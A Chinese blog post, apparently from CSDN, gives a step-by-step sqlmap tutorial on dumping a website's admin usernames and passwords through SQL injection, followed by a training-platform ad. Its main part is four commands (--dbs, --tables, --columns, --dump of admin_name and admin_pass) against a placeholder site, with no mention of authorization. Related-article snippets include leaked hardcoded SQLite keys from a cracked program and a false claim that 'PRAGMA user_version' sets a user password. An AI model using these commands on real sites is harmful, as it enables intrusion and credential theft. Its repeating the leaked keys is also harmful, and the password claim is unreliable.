sqlite用户名密码_黑客利用工具轻易获取管理员账户密码,你的网站危险了

最新推荐文章于 2024-05-08 09:00:34 发布
最新推荐文章于 2024-05-08 09:00:34 发布
阅读量1.1k 收藏 1
点赞数
文章标签: sqlite用户名密码 获取本地管理员账户的密码

首先,先简单介绍下sqlmap

简介:

sqlmap是一种开源的工具,可以自动检测和利用SQL注入以及接入该库的服务器。它拥有非常强大的检测引擎、具有多种特性的器、通过库指纹提取访问底层文件系统并通过外带连接执行命令。

支持的数据库:MySQL,Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase and SAP MAXDB。

sqlmap支持五种不同的注入模式:

UNION query SQL injection(可联合查询注入Error-based SQL injection(报错型注入)Boolean-based blind SQL injection(布尔型注入)Time-based blind SQL injection(基于时间延迟注入)Stacked queries SQL injection(可多语句查询注入)

基本用法:-u 使用sqlmap--dbs 获取数据库名--tables 获取表名--columns 获取字段名

--dump 获取字段内容

实战:

1.获取库名

python2 sqlmap.py -u "http://xxx.com" --dbs

e76f9eec843766ff807db10e2441525a.png

成功获取库名

52ad3b716ecc129e404b22e0cb21dd58.png

接下来得根据经验,猜他的账户,密码 在哪个库里,或者都进去看看也可以。

2.继续获取表名

python2 sqlmap.py -u "http://xxx.com" -D 库名 --tables

370b2f8e43433dc448f5fe802d410560.png

看见admin 看来离目标 不远了

3.获取字段名

python2 sqlmap.py -u "http://xxx.com" -D 库名 -T admin --columns

2a4101a395e0cd66775fa1140f6bcd0d.png

看到admin_name admin _pass 果然就在这

4.获取用户名,密码

python2 sqlmap.py -u "http://xxx.com" -D 库名 -T admin -C admin_name,admin_pass --dump

b7b43ab645a72abed40bd16a0544285b.png

安界网通过开发全球顶尖的网络安全教育精品内容,致力于教育+AI、理论+实战、线上+线下的创新科技教育模式,结合专有师带徒模式贴合应用、实战式教学场景,打造知识课程、社交实战和生态服务为一体的全栈式网络安全教育服务平台;同时研发辅助安全教育平台工具化和产品化的安全服务类型产品;实现为企业提供"一站式"全生命周期的网络安全综合服务提供商。有兴趣的小伙伴可以私信撩我!

weixin_39921504
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Linux安装编译SQLCipher,对sqlite数据库加密、解密、修改、去掉密码操作
gllg1314的专栏
01-08 1万+
本文主要是自己在实际用的过程记录,如发现理解错误,欢迎指正。 1https://github.com/sqlcipher/sqlcipher 下载源代码 2 # ./configure --enable-tempstore=yes CFLAGS="-DSQLITE_HAS_CODEC" 3 # make make: tclsh: Command not found make:
C#在Windows下加密解密SQLite
Bytez的博客
05-06 771
使用“System.Data.SQLite”库进行加密解密
终于找到微信聊天记录SQLite数据库文件解密方法了,一起来看看吧!
最新发布
隔壁老瓦的专栏
05-08 3046
获取当前登录微信的微信昵称、账号、手机号、邮箱、秘钥、微信Id、文件夹路径将微信PC的多个聊天记录数据库合并为单一数据库文件支持微信聊天对话窗口(文本消息,引用消息,图片消息,表情消息,卡片链接消息,系统消息,等)综合管理微信会话、联系人、群聊与朋友圈支持导出微信各类记录(聊天记录,联系人,群聊,等)查看历史朋友圈记录,超越三日限制,随时回看朋友圈历史展示好友数、群聊数及今日收发消息总量的微信统计功能过去15天内每日微信消息数量统计最近一个月内微信互动最频繁的前10位联系人。
sqlmap,扫描网站数据库并得到用户名密码
专注前端技术,包括Web端、移动端、小程序、APP
02-04 9832
接着上篇文章,你已经对sqlmap有了了解。那么我们今天就进一步了解sqlmap,使用sqlmap对一个网站解剖分析! SqlMap的程序允许检查网站的SQL注入漏洞,XSS漏洞的存在,并且可以还利用SQL注入。支持多种SQL注入类型和多种数据库。 我们可以使用sqlmap检查网站中是否存在漏洞。 如果该站点容易受到SQL注入的攻击,则骇客可以进行以下攻击: 从数据库接收信息,包括转储(整个)数...
Android:用 SQLite 实现 用户的登录查询功能(详解+效果图)
潘小蓝的博客
05-29 8227
文章目录前言:什么是SQLite?为什么要用 SQLite?常见的应用场景:实现功能:实现效果:代码部分:总结: 前言: 在侃实现功能之前,先来侃侃什么是SQLiteSQLite的具体应用场合有哪些?(了解的大佬就可以跳过啦,嘻嘻,也可以复习一下哦)。 什么是SQLite? SQLite是一个进程内的库,实现了自给自足的、无服务器的、零配置的、事务性的 SQL 数据库引擎。它是一个零配置的数据库,这意味着与其他数据库一样,您不需要在系统中配置。 就像其他数据库,SQLite 引擎不是一个独立的进程,可以
SQLite密码修改器,用于给sqlite数据库添加或修改密码
11-27
SQLite密码修改器,基于.net framework 4,可用来给sqlite数据库添加密码或修改密码,直接解压缩即可使用,内包含了测试的数据库文件,默认密码abc123。加密后的数据库文件可在VB.NET中使用,需要用到的dll文件可...
SQLiteSpy_1.7.9.zip_SQLite 工具_SQLiteSpy_sqlite_数据库 工具_查看 sqlite
09-23
SQLiteSpy是一款功能强大的SQLite数据库管理工具,专为开发者和数据库管理员设计,用于高效地查看、创建、修改和分析SQLite数据库。SQLite是一款轻量级的关系型数据库管理系统,广泛应用于嵌入式系统和移动应用中,...
login_exactg2t_stickcld_实现用户名密码登录功能_源码
10-02
对于大量用户,你可能需要考虑性能优化,例如使用索引来加快用户名密码的查找速度,或者在数据库设计时采用更高效的数据结构。 总结,"login_exactg2t_stickcld"项目通过QtSql实现了与数据库的交互,以实现用户名...
LoginToASqlite3DatabaseWithoutCredentialsWithAdminer:管理员插件,可使用没有凭据(没有用户名密码SQLite数据库
05-21
:United_States: 无需插件即可登录到SQLite3数据库的管理员插件 Web应用程序此插件允许您“连接到数据库服务器 ”,而无需提供凭据(无需用户名密码) 。 :warning: 此插件不应在生产环境中使用: 它提供对PHP...
修改SQLite数据库密码工具源码
03-12
这个工具的核心功能是允许用户更改已加密SQLite数据库的密码,甚至支持设置为空密码,以便在无需密码的情况下访问数据库。 首先,你需要理解SQLite数据库的加密机制。SQLite本身并不直接支持密码保护,但可以通过...
Sqlite数据库加密、修改密码工具
12-08
Sqlite数据库加密、解密工具,主要是用于进行给Sqlite数据库进行加密,修改密码工具
SQLite数据库 ,实现本地、登录、注册、 修改、注销账号、记住密码
02-25
SQLite数据库 ,实现本地、登录、注册、 修改、注销账号、记住密码
sqlite对db文件进行设置密码加密
04-24
可以对sqlite的db文件进行设置密码;自己环境win10 64位,32位也应该支持,如果有不支持的地方欢饮留言联系,欢饮大家下载使用,下载不会用了,请查看本人博客
修改数据库用户名密码
09-26
很多人经常在修改数据库用户名的时候未能成功,主要是落下一个步骤,在这里特别指明提出来,希望对尚未成功的人有所帮助
如何查询SQLite数据库中的所有用户信息
m0_74346238的博客
01-04 741
Android Studio如何在SQLite数据库中查询所有的用户信息。
首次使用HOOKAPI暴力破解SQLITE3加密的数据库
热门推荐
bihai.org
12-23 1万+
怕原作者生气,在这就不放源代码了。 最近研究“给力大CI典”的时候,反汇编了一下,是用DELPHI写的,使用SQLITE3定制版本加密了一部分数据库,于是通过HOOKAPI到sqlite3_key,找到了密码,然后用VB6写了个解密SQLITE3的工具,把数据库都解密了。 这里就给出两个密钥: 1、shao8977545*S 用于zclb.db。 2、shao897754*Z 用于其余...
sqlite用户名密码_数据库初学者的福音——SQLite
weixin_39565777的博客
12-09 6030
导读数据库操作应该算是所有程序员的基本功了,写的一手好SQL对于数据分析师而言更是安身立命之本。前期,个人惯用的是MySQL,近日由于工作需要对Sqlite使用更为频繁,所以便简单了解了一下,发现sqlite当真有其好用的一面,堪称是数据库初学者的福音。做以简单纪要。01 sqlite简介sqlite是一款简单便携的内置数据库,无论是PC端还是移动端,都无需安装即可直接存储、访问和更改。...
C#给Sqlite数据库进行加密、修改密码
CoffeMilk的博客
12-08 1万+
一、效果图如下: 二、具体实现功能 1、创建windows窗体应用程序: 2、编写控制脚本: ①sqlite数据库帮助类:SqliteHelper.cs using System; using System.Collections.Generic; using System.Linq; using System.Text; using System.Data.SQLite...
如何查看sqlite用户名密码
06-08
1. 使用管理员账户登录SQLite。 2. 使用以下命令更改用户的密码: ``` PRAGMA user_version = new_version; ``` 其中,"user_version"是与用户关联的版本号,"new_version"是您要设置的新密码。请注意,这种方法只...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值